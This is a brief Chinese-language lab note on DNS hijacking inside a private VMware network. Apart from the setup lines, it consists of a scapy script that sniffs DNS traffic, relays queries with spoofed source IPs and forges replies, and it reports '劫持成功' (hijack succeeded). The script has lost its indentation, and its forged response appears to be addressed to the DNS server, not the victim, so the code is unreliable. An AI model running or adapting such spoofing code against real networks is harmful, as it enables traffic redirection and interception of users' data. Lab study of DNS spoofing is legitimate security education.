环境:
配置一个目标网站www.wf.com
设置dns解析www.wf.com
网卡:192.168.88.2
Win7 被欺骗的 ip:192.168.88.143
Win server 2008 DNS服务器 ip:192.168.88.136
选择自己所在的网卡
代码如下:
from scapy.all import *
dnss="192.168.88.136"
xwlan="VMware Virtual Ethernet Adapter for VMnet8"
def task(p):
try:
pip=p[IP]
pudp=p[UDP]
pdns=p[DNS]
if p.dport==53 and pip.dst=="192.168.88.2": #请求包
#192.168.88.1给假dns发包
send(IP(src="192.168.88.1",dst=dnss,ttl=55)/UDP(sport=p.sport,dport=53)/pdns,iface=xwlan)
mm=pip.src
print(mm)
print("转发查询成功",mm)
#假dns发包给192.168.88.1回包
elif p.sport==53 and pip.src==dnss: #响应包
#开始造给目标主句造一个假包
mm=pip.src
send(IP(src="192.168.88.2",dst=mm,ttl=55)/UDP(sport=53,dport=p.dport)/pdns,iface=xwlan)
wz=pdns.qname.decode()
print(wz,"转发响应成功")
#except Exception as e:
#print(e)
except:
pass
print("开始攻击")
sniff(iface=xwlan,filter="udp port 53",timeout=300,prn=task)
劫持成功
抓包分析
